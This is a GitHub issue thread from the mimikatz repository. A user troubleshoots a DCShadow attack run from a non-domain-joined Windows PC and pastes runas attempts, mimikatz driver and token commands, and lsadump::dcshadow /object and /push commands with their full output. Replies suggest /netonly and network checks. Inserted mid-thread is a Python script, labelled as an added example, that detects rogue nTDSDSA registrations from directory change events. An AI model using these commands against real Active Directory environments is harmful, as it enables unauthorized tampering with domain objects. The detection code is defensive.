gentilkiwi / mimikatz

A little tool to play with Windows security
http://blog.gentilkiwi.com/mimikatz

Can't find way to run Mimikatz in context of a domain administrator on non-domain-joined PC for DC Shadow attack #423

Open rick-engle opened 1 year ago

rick-engle commented 1 year ago

I'm looking for a way to launch mimikatz within the context of an AD domain administrator (DA) so that if I use the token::whoami command it shows me running in that context:

```
mimikatz # token::whoami
 * Process Token : {0;000003e7} 2 D 1443633 TARGETDOMAIN\ADMINUSER S-1-5-18 (04g,30p) Primary
 * Thread Token  : no token
```

The attack PC does have line of sight to a Domain Controller, but I can't figure out how I can start mimikatz in that DA context. Is there a way to do this?

Thanks.

picheljitsu commented 1 year ago

Uhh, did you try runas already?


rick-engle commented 1 year ago

I did try that but unfortunately I get this error:

```
C:\temp>runas /user:mydomain.com\badadmin "C:\Attackfolder\x64\mimikatz.exe"
Enter the password for mydomain.com\badadmin:
Attempting to start C:\Attackfolder\x64\mimikatz.exe as user "mydomain.com\badadmin" ...
RUNAS ERROR: Unable to run - C:\Attackfolder\x64\mimikatz.exe
1787: The security database on the server does not have a computer account for this workstation trust relationship.
```

gentilkiwi commented 1 year ago

/netonly

rick-engle commented 1 year ago

Hi @gentilkiwi, that command works but doesn't seem to change the user context. If I use this it launches mimikatz OK, but the whoami still shows me in the context of the local admin account I signed into the Windows PC with:

```
runas /netonly /user:mydomain.com\badadmin "C:\Attackfolder\x64\mimikatz.exe"

mimikatz # token::whoami
```

gentilkiwi commented 1 year ago

The /netonly is ... network only. If all is OK, you'll see the correct user, for example, in a network capture.

rick-engle commented 1 year ago

Ok that is good to know. I put everything together for my DC Shadow attack (which I can get working fine on a domain-joined PC) but the first mimikatz session making an attribute change never receives the sync from session #2 making the push. I did turn off the Windows firewalls on this Windows 10 PC as I did on other domain-joined machines where this worked. I guessed at the parameters I needed for the lsadump::dcshadow /object and lsadump::dcshadow /push commands to enable them to find the domain controller. This attack PC DOES have line of sight to the domain controller:

Mimikatz session #1

```
  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz # !+
[+] 'mimidrv' service already registered
[*] 'mimidrv' service already started

mimikatz # !processtoken
Token from process 0 to process 0
 * from 0 will take SYSTEM token
 * to 0 will take all 'cmd' and 'mimikatz' process
Token from 4/System
 * to 4976/cmd.exe
 * to 5704/mimikatz.exe
 * to 2844/mimikatz.exe

mimikatz # lsadump::dcshadow /object:jeffl /dc:DC1.mydomain.com /attribute:Description /value="My new cool description is swell!"
** Domain Info **

Domain:        DC=mydomain,DC=com
Configuration: CN=Configuration,DC=mydomain,DC=com
Schema:        CN=Schema,CN=Configuration,DC=mydomain,DC=com
dsServiceName: ,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=mydomain,DC=com
domainControllerFunctionality: 6 ( WIN2012R2 )
highestCommittedUSN: 635132

** Server Info **

Server: DC1.mydomain.com
  InstanceId  : {52021f09-72f2-4471-9114-9e582b9c071c}
  InvocationId: {254a564c-26b5-45cc-a01a-4774f80bab1a}
Fake Server (not already registered): ATTACKER-EXT.mydomain.com

** Attributes checking **

#0: Description

** Objects **

#0: jeffl
DN:CN=JeffL,CN=Users,DC=mydomain,DC=com
  Description (2.5.4.13-d rev 1):
    My new cool description is swell!
    (4d00790020006e0065007700200063006f006f006c0020006400650073006300720069007000740069006f006e0020006900730020007300770065006c006c0021000000)

** Starting server **

 > BindString[0]: ncacn_ip_tcp:ATTACKER-EXT[53196]
 > RPC bind registered
 > RPC Server is waiting!
== Press Control+C to stop ==
```

Mimikatz session #2, launched with: runas /netonly /user:mydomain.com\badadmin "C:\Attackfolder\x64\mimikatz.exe"

```
mimikatz # token::whoami
 * Process Token : {0;00630804} 2 L 6490326 ATTACKER-EXT\georgej S-1-5-21-3967830162-2019074872-1635380170-1000 (12g,05p) Primary
 * Thread Token  : no token

mimikatz # lsadump::dcshadow /push
ERROR kull_m_net_getDC ; DsGetDcName: 1355

mimikatz # lsadump::dcshadow /push /dc:DC1.mydomain.com
** Domain Info **

Domain:        DC=mydomain,DC=com
Configuration: CN=Configuration,DC=mydomain,DC=com
Schema:        CN=Schema,CN=Configuration,DC=mydomain,DC=com
dsServiceName: ,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=mydomain,DC=com
domainControllerFunctionality: 6 ( WIN2012R2 )
highestCommittedUSN: 635133

** Server Info **

Server: DC1.mydomain.com
  InstanceId  : {52021f09-72f2-4471-9114-9e582b9c071c}
  InvocationId: {254a564c-26b5-45cc-a01a-4774f80bab1a}
Fake Server (not already registered): ATTACKER-EXT.mydomain.com

** Performing Registration **

** Performing Push **

Syncing DC=mydomain,DC=com
Sync Done

** Performing Unregistration **
```
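What the "Performing Registration" / "Performing Unregistration" steps above leave behind on the real DC is a server and nTDSDSA object for ATTACKER-EXT under CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration that exists only for the duration of the push, which is what a defender can alert on. The following is an added example, not code from the issue or from mimikatz: it walks constructed Directory Service change events in the shape of Windows Security events 5137 (object created) and 5141 (object deleted), with an assumed field layout and an assumed inventory of legitimate DCs, and reports nTDSDSA objects for servers that are not in that inventory.

```python
# Added example, not from the issue or from mimikatz: flag the short-lived
# server/nTDSDSA registration that a DCShadow push leaves in the Configuration
# partition. Input is constructed Directory Service change events in the shape
# of Windows events 5137 (object created) / 5141 (object deleted); the field
# names are an assumption, not a real log schema.
from datetime import datetime

# Constructed sample: a rogue server object appears under CN=Servers and is gone 2 s later.
SAMPLE_EVENTS = [
    {"id": 5137, "time": "2023-03-17T14:47:10", "class": "server",
     "dn": "CN=ATTACKER-EXT,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=mydomain,DC=com"},
    {"id": 5137, "time": "2023-03-17T14:47:10", "class": "nTDSDSA",
     "dn": "CN=NTDS Settings,CN=ATTACKER-EXT,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=mydomain,DC=com"},
    {"id": 5137, "time": "2023-03-17T14:47:11", "class": "user",  # unrelated change, ignored
     "dn": "CN=JeffL,CN=Users,DC=mydomain,DC=com"},
    {"id": 5141, "time": "2023-03-17T14:47:12", "class": "nTDSDSA",
     "dn": "CN=NTDS Settings,CN=ATTACKER-EXT,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=mydomain,DC=com"},
    {"id": 5141, "time": "2023-03-17T14:47:12", "class": "server",
     "dn": "CN=ATTACKER-EXT,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=mydomain,DC=com"},
]
KNOWN_DCS = {"DC1"}  # assumed inventory of legitimate domain controllers

def server_name(dn):
    """Server CN for an object under CN=Servers,<site>,CN=Sites; None otherwise."""
    parts = [p.strip() for p in dn.split(",")]
    if "CN=Sites" not in parts or "CN=Servers" not in parts:
        return None
    idx = parts.index("CN=Servers")
    return parts[idx - 1][len("CN="):] if idx > 0 else None

def find_rogue_dc_registrations(events, known_dcs):
    """Pair 5137/5141 nTDSDSA events for servers absent from the DC inventory.
    Each finding says whether the object was removed again and how long it lived;
    a registration with no deletion means the rogue object is still in AD."""
    created, findings = {}, []
    for ev in sorted(events, key=lambda e: e["time"]):
        name = server_name(ev["dn"]) if ev["class"] == "nTDSDSA" else None
        if name is None or name in known_dcs:
            continue
        stamp = datetime.fromisoformat(ev["time"])
        if ev["id"] == 5137:
            created[name] = stamp
        elif ev["id"] == 5141 and name in created:
            life = (stamp - created.pop(name)).total_seconds()
            findings.append({"server": name, "unregistered": True, "lifetime_s": life})
    for name in created:  # registered but never removed
        findings.append({"server": name, "unregistered": False, "lifetime_s": None})
    return findings
```

Directory Service change events are only written when "Audit Directory Service Changes" is enabled and the Configuration partition carries a matching SACL, so the inventory check is only as good as that audit coverage.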

picheljitsu commented 1 year ago

Are you in a virtualized environment or attached to multiple networks? Also, have you dumped DNS traffic to see what's going on?


bbhorrigan commented 1 year ago

Reading through this, it seems like you are having network issues, because I can't imagine this not being related to some type of network issue.